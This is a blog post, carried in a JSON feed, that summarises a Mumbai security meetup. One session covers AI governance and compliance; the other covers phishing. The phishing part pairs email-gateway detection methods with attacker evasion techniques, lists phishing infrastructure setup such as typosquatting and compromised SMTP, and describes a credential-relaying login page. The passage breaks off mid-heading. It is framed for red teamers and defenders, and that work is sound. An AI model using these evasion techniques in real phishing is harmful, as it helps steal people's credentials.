{
    "version": "https://jsonfeed.org/version/1",
    "title": "Haxnation Blog Blog",
    "home_page_url": "https://haxnation.github.io/blog",
    "description": "Haxnation Blog Blog",
    "items": [
        {
            "id": "https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary",
            "content_html": "<p>This blog is a summary of what was taught at Haxnation Meetup Mumbai held on 27th June 2026.</p>\n<style>\n.diagram-container { margin: 1.5rem auto; max-width: 820px; text-align: center; }\n.diagram-caption { font-size: 0.95rem; color: #3a3a3a; margin-top: 0.5rem; }\n.diagram-img { width: 100%; max-width: 780px; border-radius: 8px; box-shadow: 0 12px 28px rgba(0,0,0,0.06); display: inline-block; }\n.diagram-img.small-diagram { max-width: 350px; }\n.diagram-svg { width: 100%; max-width: 780px; height: auto; display: inline-block; transition: transform 0.25s ease; }\n.diagram-svg:hover { transform: scale(1.01); }\n.diagram-text { font-family: ui-sans-serif, system-ui, sans-serif; fill: #4c7ece; font-size: 12px; }\n.diagram-title { font-family: ui-sans-serif, system-ui, sans-serif; fill: #4c7ece; font-size: 13px; font-weight: 700; }\n</style>\n<p>Before beginning the summary, I would like to tell you that if you are reading this and you did'nt show up, then you missed some serious fun and learning, come down to meetups whenever you are free, this session was packed with back to back questionaire and we had a wonderfull time learning and having fun together.</p>\n<p>Alright alright, enough with promoting our community, so before you all cuss me virtually or cuss me in your heads, I will begin with my usual thing of summarizing the meetup down.</p>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"session-1-grc-in-the-ai-era-by-dr-deepak-kalambkar\">Session 1: \"GRC in the AI Era\" by Dr. Deepak Kalambkar<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#session-1-grc-in-the-ai-era-by-dr-deepak-kalambkar\" class=\"hash-link\" aria-label=\"Direct link to Session 1: &quot;GRC in the AI Era&quot; by Dr. Deepak Kalambkar\" title=\"Direct link to Session 1: &quot;GRC in the AI Era&quot; by Dr. Deepak Kalambkar\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"what-is-grc\">What is GRC?<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#what-is-grc\" class=\"hash-link\" aria-label=\"Direct link to What is GRC?\" title=\"Direct link to What is GRC?\" translate=\"no\">​</a></h3>\n<p>GRC stands for Governance, Risk, and Compliance - the three core components that keep an organization secure and legally sound.</p>\n<ul>\n<li class=\"\"><strong>Governance</strong>: <mark>The governance of all policies and procedures.</mark> Depending on our company's internal rules and goals, we prepare policies that dictate how things should be run.</li>\n<li class=\"\"><strong>Risk</strong>: <mark>Identifying the risks that are present in our organization</mark> and can negatively impact our business operations.</li>\n<li class=\"\"><strong>Compliance</strong>: <mark>Following the regulations put in place by various governing organizations.</mark> Depending on the field our company operates in, we must adhere to specific laws and standards (e.g., if we are in the financial sector, we must follow RBI guidelines; if dealing with healthcare, HIPAA; or DPDP Act for data protection in India).</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"why-grc-must-evolve-in-the-ai-era\">Why GRC Must Evolve in the AI Era<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#why-grc-must-evolve-in-the-ai-era\" class=\"hash-link\" aria-label=\"Direct link to Why GRC Must Evolve in the AI Era\" title=\"Direct link to Why GRC Must Evolve in the AI Era\" translate=\"no\">​</a></h3>\n<p>Traditional GRC was designed for humans, operating at human speed with periodic audits and annual risk reviews. But what happens when AI runs the enterprise?</p>\n<ul>\n<li class=\"\">AI operates 24x7 and processes millions of micro-decisions daily.</li>\n<li class=\"\">Our controls must match this velocity. Traditional frameworks often don't know what the AI is doing inside the organization in real-time.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-grcai-gap\">The GRC–AI Gap<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#the-grcai-gap\" class=\"hash-link\" aria-label=\"Direct link to The GRC–AI Gap\" title=\"Direct link to The GRC–AI Gap\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><strong>Risk Velocity:</strong> Traditional cycles are quarterly/annual. AI model drift is detectable in hours.</li>\n<li class=\"\"><strong>Decision Maker:</strong> Humans are auditable and explainable. Algorithms are often a black box.</li>\n<li class=\"\"><strong>Audit Trail:</strong> Traditional methods rely on documented sign-offs. AI makes billions of micro-decisions where logging everything is infeasible.</li>\n<li class=\"\"><strong>Regulatory Triggers:</strong> Traditional triggers involve data breaches. AI triggers involve algorithmic bias, hallucinations, and model outputs.</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-ai-risk-landscape\">The AI Risk Landscape<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#the-ai-risk-landscape\" class=\"hash-link\" aria-label=\"Direct link to The AI Risk Landscape\" title=\"Direct link to The AI Risk Landscape\" translate=\"no\">​</a></h3>\n<p>Dr. Deepak highlighted six critical categories every GRC professional must own:</p>\n<ol>\n<li class=\"\"><strong>Model Risk (Hallucination &amp; Drift):</strong> AI confidently giving wrong answers. Model performance degrades silently over time.</li>\n<li class=\"\"><strong>Data Risk (Poisoning &amp; Privacy):</strong> Malicious training data corrupting model behavior. Processing personal data triggers DPDP obligations.</li>\n<li class=\"\"><strong>Ethical Risk (Bias &amp; Discrimination):</strong> AI reinforcing historical biases (gender, geography) in critical decisions like credit or hiring.</li>\n<li class=\"\"><strong>Governance Risk (Shadow AI):</strong> Employees adopting AI tools (like ChatGPT) without IT/GRC awareness. Ungoverned models mean ungoverned risk.</li>\n<li class=\"\"><strong>Supply Chain Risk (Third-Party AI Vendors):</strong> Assessing outsourced AI vendor risks, including training data lineage and architecture.</li>\n<li class=\"\"><strong>Compliance Risk (Explainability Failure):</strong> Regulators demanding to know <em>why</em> an AI made a certain decision. Without an Explainable AI (XAI) layer, this cannot be answered legally or ethically.</li>\n</ol>\n<blockquote>\n<p><mark><strong>Note on BFSI Spotlight:</strong></mark>\nIn the financial sector, these risks manifest as AI credit scoring biases (e.g., scoring applicants lower based on geography instead of credit history) or fraud detection models silently failing and being overridden by operators without an audit trail.</p>\n</blockquote>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"adapting-the-framework-the-4-layer-ai-governance-model\">Adapting the Framework (The 4-Layer AI Governance Model)<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#adapting-the-framework-the-4-layer-ai-governance-model\" class=\"hash-link\" aria-label=\"Direct link to Adapting the Framework (The 4-Layer AI Governance Model)\" title=\"Direct link to Adapting the Framework (The 4-Layer AI Governance Model)\" translate=\"no\">​</a></h3>\n<p>We should extend, not replace, our existing frameworks (like ISO 27001, ISO 42001, NIST AI RMF, and RBI/SEBI guidelines). The 4-layer model includes:</p>\n<ol>\n<li class=\"\"><strong>Govern</strong>: Board-level AI Risk Policy, AI Inventory, assigning an AI Owner, and establishing an AI Ethics Charter.</li>\n<li class=\"\"><strong>Identify</strong>: Conducting Model Risk Assessments, classifying training data, and mapping DPDP consent for AI inputs.</li>\n<li class=\"\"><strong>Control</strong>: Validating models, requiring an XAI layer, governing access to AI systems, and adversarial testing (red-teaming).</li>\n<li class=\"\"><strong>Monitor</strong>: Continuous model drift detection, automated compliance alerts, and quarterly performance audits.</li>\n</ol>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"regulatory-reality-dpdp-act-2023\">Regulatory Reality (DPDP Act 2023)<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#regulatory-reality-dpdp-act-2023\" class=\"hash-link\" aria-label=\"Direct link to Regulatory Reality (DPDP Act 2023)\" title=\"Direct link to Regulatory Reality (DPDP Act 2023)\" translate=\"no\">​</a></h3>\n<p>The DPDP (Digital Personal Data Protection) Act 2023 is live and AI is squarely in its scope:</p>\n<ul>\n<li class=\"\"><strong>Consent is Required:</strong> Any AI system processing personal data to make decisions must obtain free, specific, and informed consent.</li>\n<li class=\"\"><strong>Right to Explanation:</strong> Data Principals can request explanations of automated decisions affecting them.</li>\n<li class=\"\"><strong>Data Fiduciary Duty:</strong> The organization remains liable even if an AI vendor processes the data.</li>\n<li class=\"\"><strong>Penalties:</strong> Up to INR 250 crore per violation!</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"5-things-to-do-on-monday-morning\">5 Things to Do on Monday Morning<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#5-things-to-do-on-monday-morning\" class=\"hash-link\" aria-label=\"Direct link to 5 Things to Do on Monday Morning\" title=\"Direct link to 5 Things to Do on Monday Morning\" translate=\"no\">​</a></h3>\n<p>To summarize, here are the actionable steps for GRC professionals:</p>\n<ol>\n<li class=\"\"><strong>Build your AI Inventory:</strong> List every AI model and SaaS tool in use before the regulator asks.</li>\n<li class=\"\"><strong>Appoint an AI Risk Owner:</strong> Assign a Model Risk Officer.</li>\n<li class=\"\"><strong>DPDP Consent Audit:</strong> Map all AI-driven processing against consent requirements.</li>\n<li class=\"\"><strong>Pilot ISO 42001 Controls:</strong> Pick a few controls like an AI risk register and vendor questionnaire.</li>\n<li class=\"\"><strong>Brief the Board:</strong> Make AI risk a Board agenda item.</li>\n</ol>\n<blockquote>\n<p><em>\"GRC professionals are the new AI guardians.\" - Dr. Deepak D. Kalambkar</em></p>\n</blockquote>\n<br>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"session-2-everything-looks-legit-until-it-doesnt-by-mahadev-gavas\">Session 2: \"Everything Looks Legit Until It Doesn't\" by Mahadev Gavas<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#session-2-everything-looks-legit-until-it-doesnt-by-mahadev-gavas\" class=\"hash-link\" aria-label=\"Direct link to Session 2: &quot;Everything Looks Legit Until It Doesn't&quot; by Mahadev Gavas\" title=\"Direct link to Session 2: &quot;Everything Looks Legit Until It Doesn't&quot; by Mahadev Gavas\" translate=\"no\">​</a></h2>\n<p>Alright, now this is where the fun begins. If Session 1 was about building the walls, Session 2 is about understanding the people who try to walk right through them - while looking like they belong there.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"what-is-phishing\">What is Phishing?<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#what-is-phishing\" class=\"hash-link\" aria-label=\"Direct link to What is Phishing?\" title=\"Direct link to What is Phishing?\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\"><mark>Phishing is a type of attack where an attacker <strong>tricks people into trusting something fake</strong> and getting them to take an action they normally would.</mark></li>\n<li class=\"\">Phishing works by <strong>pretending to be something legitimate</strong>, such as:\n<ul>\n<li class=\"\">A trusted company or brand</li>\n<li class=\"\">A colleague, supplier, or manager</li>\n<li class=\"\">A login page, cloud service, or internal system</li>\n</ul>\n</li>\n<li class=\"\"><mark>It relies on <strong>abusing human trust and normal behavior.</strong></mark></li>\n</ul>\n<blockquote>\n<p>Think about it - when you receive an email from \"HR\" asking you to review a new policy document, your first instinct is to click the link, not to check the email headers. That's exactly what phishing exploits: the fact that we trust our daily workflows and the people we interact with.</p>\n</blockquote>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"defense--attack-why-understanding-detection-matters\">Defense → Attack: Why Understanding Detection Matters<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#defense--attack-why-understanding-detection-matters\" class=\"hash-link\" aria-label=\"Direct link to Defense → Attack: Why Understanding Detection Matters\" title=\"Direct link to Defense → Attack: Why Understanding Detection Matters\" translate=\"no\">​</a></h3>\n<p>This part was really interesting. Mahadev made a point that really stuck:</p>\n<ul>\n<li class=\"\"><mark>Understanding detection is more important than simply performing a phishing attack</mark>, particularly in professional and defensive security engagements.</li>\n<li class=\"\">What <strong>separates a serious security professional from a script-kiddie</strong> is knowing:\n<ul>\n<li class=\"\"><em>Why</em> an email was blocked?</li>\n<li class=\"\"><em>Which control</em> caught it?</li>\n<li class=\"\">At <em>what stage</em> it was detected?</li>\n</ul>\n</li>\n<li class=\"\"><strong>If you don't understand detection, you're just pressing \"send\".</strong></li>\n</ul>\n<blockquote>\n<p>This is a crucial mindset shift. Anyone can clone a website and send a phishing email using a template. But if you don't know <em>why</em> your email got blocked or <em>how</em> the target's email gateway flagged it, you're not doing security - you're doing guesswork. Understanding the defensive side first is what makes you effective on the offensive side.</p>\n</blockquote>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"detection-methods-and-how-attackers-try-to-bypass-them\">Detection Methods (and How Attackers Try to Bypass Them)<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#detection-methods-and-how-attackers-try-to-bypass-them\" class=\"hash-link\" aria-label=\"Direct link to Detection Methods (and How Attackers Try to Bypass Them)\" title=\"Direct link to Detection Methods (and How Attackers Try to Bypass Them)\" translate=\"no\">​</a></h3>\n<p>Now this is where it gets really juicy. Mahadev covered the various detection methods that email security gateways, proxies, and security tools use to catch phishing - and by extension, what an attacker needs to understand if they want to operate professionally in red team engagements.</p>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"1-suspicious-tld-top-level-domain\">1. Suspicious TLD (Top-Level Domain)<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#1-suspicious-tld-top-level-domain\" class=\"hash-link\" aria-label=\"Direct link to 1. Suspicious TLD (Top-Level Domain)\" title=\"Direct link to 1. Suspicious TLD (Top-Level Domain)\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><strong>What is it?</strong> <mark>A Top-Level Domain (TLD) is the last part of a domain name - the <code>.com</code>, <code>.org</code>, <code>.in</code> part.</mark> Security tools maintain lists of TLDs that are commonly abused for phishing, such as <code>.xyz</code>, <code>.top</code>, <code>.click</code>, <code>.buzz</code>, <code>.rest</code>, etc. These are cheap to register and frequently used by attackers, so email gateways flag or block emails coming from or linking to these TLDs.</li>\n<li class=\"\"><strong>How attackers exploit/bypass it:</strong> They register domains under reputable TLDs like <code>.com</code>, <code>.org</code>, <code>.net</code>, or country-code TLDs like <code>.in</code> to avoid suspicion. Using a legitimate-looking TLD is step one in making a phishing domain blend in.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"2-signature-detection\">2. Signature Detection<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#2-signature-detection\" class=\"hash-link\" aria-label=\"Direct link to 2. Signature Detection\" title=\"Direct link to 2. Signature Detection\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><strong>What is it?</strong> <mark>Signature-based detection works by matching known malicious patterns - specific strings, hashes of known phishing kits, or recognized malware payloads - against incoming emails and attachments.</mark> If the content matches a known signature, it's blocked immediately.</li>\n<li class=\"\"><strong>How attackers exploit/bypass it:</strong> They modify their payloads slightly (changing variable names, recompiling, adding junk data) so the hash changes, or they use custom-built phishing kits that haven't been fingerprinted yet. Polymorphic payloads that change their signature on every delivery are also used.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"3-url-signature\">3. URL Signature<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#3-url-signature\" class=\"hash-link\" aria-label=\"Direct link to 3. URL Signature\" title=\"Direct link to 3. URL Signature\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><strong>What is it?</strong> <mark>Security tools maintain databases of known malicious URLs. When an email contains a link, the URL is checked against these blocklists.</mark> If it matches a known phishing URL, the email is quarantined or the link is defanged.</li>\n<li class=\"\"><strong>How attackers exploit/bypass it:</strong> They use newly registered domains that haven't been reported yet, or they use URL shorteners, redirectors (like open redirects on legitimate sites), or encode URLs to evade exact-match blocklists.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"4-dns-hunting\">4. DNS Hunting<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#4-dns-hunting\" class=\"hash-link\" aria-label=\"Direct link to 4. DNS Hunting\" title=\"Direct link to 4. DNS Hunting\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><strong>What is it?</strong> <mark>DNS hunting involves analyzing the DNS records and registration history of domains used in emails.</mark> Security tools look for newly registered domains (NRDs), domains with suspicious WHOIS info, or domains that resolve to known malicious IP ranges.</li>\n<li class=\"\"><strong>How attackers exploit/bypass it:</strong> They \"age\" their domains by registering them weeks or months before the campaign so they don't trigger NRD alerts. They also set up proper DNS records (MX, SPF, DKIM, DMARC) to look legitimate.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"5-visual-signature\">5. Visual Signature<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#5-visual-signature\" class=\"hash-link\" aria-label=\"Direct link to 5. Visual Signature\" title=\"Direct link to 5. Visual Signature\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><strong>What is it?</strong> <mark>Visual signature detection uses image recognition and template matching to compare the visual appearance of a phishing page or email against known legitimate brands.</mark> If a page looks like a Microsoft login but is hosted on a random domain, it gets flagged.</li>\n<li class=\"\"><strong>How attackers exploit/bypass it:</strong> They make subtle changes to the visual layout - altering logos slightly, changing color schemes, or using CSS tricks to make the page look different to automated scanners while still appearing legitimate to a human eye.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"6-url-filtering\">6. URL Filtering<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#6-url-filtering\" class=\"hash-link\" aria-label=\"Direct link to 6. URL Filtering\" title=\"Direct link to 6. URL Filtering\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><strong>What is it?</strong> <mark>URL filtering categorizes and blocks URLs based on their category (e.g., \"phishing,\" \"malware,\" \"newly registered\") using real-time cloud-based intelligence.</mark> Unlike URL signature (which is exact-match), URL filtering is more dynamic and uses reputation scoring.</li>\n<li class=\"\"><strong>How attackers exploit/bypass it:</strong> They host phishing pages on trusted platforms (like Google Sites, Azure Blob Storage, or AWS S3) that are categorized as \"Cloud/SaaS\" rather than \"Malicious.\" This way the URL inherits the trusted platform's reputation.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"7-tlsssl-fingerprinting\">7. TLS/SSL Fingerprinting<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#7-tlsssl-fingerprinting\" class=\"hash-link\" aria-label=\"Direct link to 7. TLS/SSL Fingerprinting\" title=\"Direct link to 7. TLS/SSL Fingerprinting\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><strong>What is it?</strong> <mark>TLS/SSL fingerprinting analyzes the characteristics of a server's TLS handshake (cipher suites, extensions, certificate details) to identify suspicious or anomalous servers.</mark> A phishing server using a free Let's Encrypt cert with unusual TLS configurations can be flagged.</li>\n<li class=\"\"><strong>How attackers exploit/bypass it:</strong> They use proper SSL certificates (even paid ones), configure standard TLS settings, and use CDNs like Cloudflare that normalize TLS fingerprints behind their proxy.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"8-domain-reputation\">8. Domain Reputation<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#8-domain-reputation\" class=\"hash-link\" aria-label=\"Direct link to 8. Domain Reputation\" title=\"Direct link to 8. Domain Reputation\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><strong>What is it?</strong> <mark>Domain reputation is a score assigned to a domain based on its history - how long it's been around, whether it's been associated with spam or malware before, the volume of emails it sends, and whether it has proper email authentication (SPF, DKIM, DMARC).</mark></li>\n<li class=\"\"><strong>How attackers exploit/bypass it:</strong> They build up domain reputation over time by sending legitimate-looking emails, setting up proper authentication records, and slowly warming up the domain before launching a campaign. Some attackers even compromise existing high-reputation domains instead of registering new ones.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"9-domain-categorization\">9. Domain Categorization<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#9-domain-categorization\" class=\"hash-link\" aria-label=\"Direct link to 9. Domain Categorization\" title=\"Direct link to 9. Domain Categorization\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><strong>What is it?</strong> <mark>Web proxies and security tools categorize domains (e.g., \"Business,\" \"Technology,\" \"Phishing,\" \"Uncategorized\"). Uncategorized or newly categorized domains are often blocked or flagged</mark> because legitimate businesses usually have an established category.</li>\n<li class=\"\"><strong>How attackers exploit/bypass it:</strong> They submit their phishing domains to categorization services <em>before</em> the campaign, requesting classification as \"Business\" or \"Technology.\" Or they host content on already-categorized platforms to inherit their category.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"10-ip-reputation\">10. IP Reputation<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#10-ip-reputation\" class=\"hash-link\" aria-label=\"Direct link to 10. IP Reputation\" title=\"Direct link to 10. IP Reputation\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><strong>What is it?</strong> <mark>Similar to domain reputation, IP reputation scores the IP address hosting the phishing infrastructure. IPs associated with spam networks, bulletproof hosting, or known malicious activity are blocklisted.</mark></li>\n<li class=\"\"><strong>How attackers exploit/bypass it:</strong> They use clean, reputable IP ranges from major cloud providers (AWS, Azure, GCP), rotate IPs, or use CDNs that mask the origin IP behind a shared, trusted IP pool.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"11-server-location\">11. Server Location<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#11-server-location\" class=\"hash-link\" aria-label=\"Direct link to 11. Server Location\" title=\"Direct link to 11. Server Location\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><strong>What is it?</strong> <mark>Security tools may flag or block content served from certain geographic locations that are commonly associated with malicious activity.</mark> If a \"Bank of India\" login page is hosted on a server in Eastern Europe, that's a red flag.</li>\n<li class=\"\"><strong>How attackers exploit/bypass it:</strong> They host infrastructure in the same geographic region as their target. If targeting an Indian company, they use Indian cloud regions or CDN edge nodes that serve from local points of presence.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"12-ocr-detection\">12. OCR Detection<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#12-ocr-detection\" class=\"hash-link\" aria-label=\"Direct link to 12. OCR Detection\" title=\"Direct link to 12. OCR Detection\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><strong>What is it?</strong> <mark>OCR (Optical Character Recognition) detection scans images embedded in emails for text. Attackers sometimes embed phishing content as images to bypass text-based filters</mark> - but OCR-enabled security tools can \"read\" those images and detect malicious text within them.</li>\n<li class=\"\"><strong>How attackers exploit/bypass it:</strong> They use visual obfuscation techniques - slightly distorting text in images, using unusual fonts, adding noise/watermarks, or splitting text across multiple images so OCR cannot reconstruct the full message.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"13-sandbox-detection\">13. Sandbox Detection<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#13-sandbox-detection\" class=\"hash-link\" aria-label=\"Direct link to 13. Sandbox Detection\" title=\"Direct link to 13. Sandbox Detection\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><strong>What is it?</strong> <mark>Sandboxing involves executing email attachments or opening links in an isolated virtual environment to observe their behavior.</mark> If a payload tries to steal credentials, download malware, or phone home to a C2 server, the sandbox catches it before it reaches the user.</li>\n<li class=\"\"><strong>How attackers exploit/bypass it:</strong> They build sandbox-aware payloads that check for signs of a virtual environment (checking MAC addresses, screen resolution, mouse movement, or timing analysis) and only execute the malicious behavior when they detect a real user environment. Some payloads require user interaction (like clicking a specific button or scrolling) that automated sandboxes can't replicate.</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"phishing-requirements-what-you-actually-need-to-set-up\">Phishing Requirements (What You Actually Need to Set Up)<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#phishing-requirements-what-you-actually-need-to-set-up\" class=\"hash-link\" aria-label=\"Direct link to Phishing Requirements (What You Actually Need to Set Up)\" title=\"Direct link to Phishing Requirements (What You Actually Need to Set Up)\" translate=\"no\">​</a></h3>\n<p>Now that we've covered how detection works and how people try to get around it, Mahadev broke down what a phishing operation actually requires from an infrastructure standpoint. This is important for red teamers and pentesters who need to set up professional, realistic engagements, and how to prevent the target org from reaching us.</p>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"infrastructure\">Infrastructure<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#infrastructure\" class=\"hash-link\" aria-label=\"Direct link to Infrastructure\" title=\"Direct link to Infrastructure\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><strong>Location:</strong> Host your infrastructure in a geographic region appropriate for your target. Mahadev gives an example that supposedly the org is planning to shift its premises to a different location or open a new branch for e.g. in Dubai, so there are chances that the org has already whitelisted the IPs from that location.</li>\n<li class=\"\"><strong>ASN (Autonomous System Number):</strong> <mark>The ASN identifies the network provider. Using a reputable ASN (like a major cloud provider) rather than a sketchy bulletproof hoster makes your infrastructure look legitimate.</mark></li>\n<li class=\"\"><strong>Trusted Sites:</strong> The SaaS products that the org uses comes under trusted sites.</li>\n<li class=\"\"><strong>Avoid Blacklisted IPs:</strong> Ensure the IPs you use are clean and not on any blocklists.</li>\n<li class=\"\"><strong>Compromised SMTP:</strong> Some attackers use compromised legitimate SMTP servers to send emails - inheriting the sender's existing reputation.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"domain\">Domain<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#domain\" class=\"hash-link\" aria-label=\"Direct link to Domain\" title=\"Direct link to Domain\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><strong>Right Domain:</strong> Choose a domain that looks relevant and trustworthy for the campaign context.</li>\n<li class=\"\"><strong>Vendor Impersonation:</strong> Register domains that mimic the target's vendors or partners.</li>\n<li class=\"\"><strong>Typosquatting:</strong> <mark>Registering domains that are slight misspellings of legitimate domains (e.g., <code>micosoft.com</code> instead of <code>microsoft.com</code>, <code>googel.com</code> instead of <code>google.com</code>).</mark> Users often don't notice a single character difference.</li>\n<li class=\"\"><strong>TLD Change:</strong> Using the right brand name but with a different TLD (e.g., <code>microsoft.org</code> instead of <code>microsoft.com</code>).</li>\n<li class=\"\"><strong>Third Party SaaS:</strong> Using legitimate SaaS platforms (Google Forms, Typeform, etc.) to host credential harvesting pages.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"misc\">Misc<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#misc\" class=\"hash-link\" aria-label=\"Direct link to Misc\" title=\"Direct link to Misc\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><strong>SSL Certificate:</strong> Always use HTTPS - users are trained to look for the padlock icon, and security tools flag HTTP-only sites.</li>\n<li class=\"\"><strong>WAF (Web Application Firewall):</strong> Placing a WAF or CDN (like Cloudflare) in front of your phishing page to mask the origin server and add a layer of legitimacy.</li>\n<li class=\"\"><strong>Website Cloner:</strong> Tools that create pixel-perfect copies of legitimate login pages.</li>\n<li class=\"\"><strong>SMTP:</strong> Setting up a properly configured mail server with SPF, DKIM, and DMARC records so emails don't land in spam.</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"phishing-templates-in-action\">Phishing Templates in Action<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#phishing-templates-in-action\" class=\"hash-link\" aria-label=\"Direct link to Phishing Templates in Action\" title=\"Direct link to Phishing Templates in Action\" translate=\"no\">​</a></h3>\n<p>Mahadev then showed us two real phishing templates to demonstrate how legitimate these emails can look.</p>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"template-1-azure-cloud-storage-full\">Template 1: Azure Cloud Storage Full<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#template-1-azure-cloud-storage-full\" class=\"hash-link\" aria-label=\"Direct link to Template 1: Azure Cloud Storage Full\" title=\"Direct link to Template 1: Azure Cloud Storage Full\" translate=\"no\">​</a></h4>\n<p>The first template was an email that says something along the lines of <em>\"Your Azure Cloud Storage is full, please login to review and manage your files.\"</em> - a perfectly normal-looking notification that anyone using Azure would expect.</p>\n<p>Now here's the interesting part - <mark>the phishing page uses <strong>URL rewriting</strong> (also called a transparent proxy or relay). When the victim enters their credentials on the fake login page, the attacker captures the credentials, and then the page actually logs the user into the <strong>real Microsoft portal</strong> using those same credentials.</mark> From the user's perspective, they typed their password, hit enter, and boom - they're on their actual Azure dashboard. Nothing suspicious happened, right? Wrong. The attacker already has the creds sitting in their logs.</p>\n<blockquote>\n<p>This is what makes modern phishing so dangerous - the victim never even realizes they were phished because they end up on the legitimate site. No error page, no weird redirect, no \"hmm that was strange\" moment. Just a smooth, clean login experience - except someone else now has your password.</p>\n</blockquote>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"template-2-amazon-voucher--certification-discount\">Template 2: Amazon Voucher / Certification Discount<a href=\"https://haxnation.github.io/blog/haxnation-mumbai-meetup-june26-summary#template-2-amazon-voucher--certification-discount\" class=\"hash-link\" aria-label=\"Direct link to Template 2: Amazon Voucher / Certification Discount\" title=\"Direct link to Template 2: 